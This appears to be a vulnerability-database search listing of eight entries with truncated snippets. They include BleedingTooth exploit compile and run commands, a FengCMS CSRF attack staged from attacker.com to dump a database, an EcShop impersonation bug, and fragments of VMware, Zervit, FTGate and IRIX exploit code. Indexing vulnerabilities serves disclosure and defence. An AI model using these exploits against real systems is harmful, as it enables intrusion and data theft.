8 matches found
EUVD-2025-18669
Malicious code in bioql PyPI...
Linux Kernel 5.4 BleedingTooth Remote Code Execution
/ BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution by Andy Nguyen theflow@ This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352. Compile using: $ gcc -o exploit exploit.c -lbluetooth and execute as: $ sudo ./exploit targetmac sourceip sourceport ...
FengCMS的CSRF漏洞可导致数据库被dump
简要描述: 重要功能未进行csrf token验证导致可被脱裤 详细说明: 后台管理中的数据备份功能未进行csrf token验证。 攻击者制作内容如下的csrf.php并放到attacker.com下面: 随后将http://attacker.com/csrf.php这个URL发送给受害者(网站管理员)。如果管理员在打开该URL时处于登录状态就会以管理员的身份像目标服务器发送备份数据库的请求: ?controller=dbmanage&operate=save&type=0...
EcShop冒充任意用户发商品评论,合理利用可操纵网店舆论
简要描述: 登录用户可以冒充任意其他注册用户对任意商品发表评论,合理利用可操纵网店舆论 详细说明: 漏洞代码在comment.php的287行处: $username = empty$cmt-username ? $SESSION'username' : trim$cmt-username; $cmt是一个json数据结构,在comment.php的37行处赋值: $cmt = $json-decode$REQUEST'cmt'; 由此可见,这里只要用户提交了"username":"any user account"的json code,就能冒充任意用户发表对指定商品的评论! 漏洞证明:...
VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys'
/ CVE-2013-1406 exploitation PoC by Artem Shishkin, Positive Research, Positive Technologies, 02-2013 / void stdcall FireShellDWORD dwSomeParam EscalatePrivilegeshProcessToElevate; // Equate the stack and quit the cycle ifndef AMD64 asm pop ebx pop edi push 0xFFFFFFF8 push 0xA010043 endif HANDLE...
Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)
Zervit Web Server 0.02 - Remote Buffer Overflow PoC Zervit Webserver 0.02 Buffer Overflow By: e.wiZz! Site: www.balcansecurity.com Found with ServMeNot world's sexiest fuzzer :P In the wild... Vend0r site: http://www.ohloh.net/projects/mereo / When requested uri isn't found,it goes to char tmp255...
FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow (PoC)
FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow PoC !/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli [email protected]\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host,...
irix.telnetd.txt
We've found a very severe vulnerability in the IRIX telnetd service that upon successful exploitation can give remote root access to any IRIX 6.2-6.5.8m,f system. The bug discussed here appeared in IRIX 5.2-6.1 systems and was the result of SGI efforts to patch a security vulnerability reported b...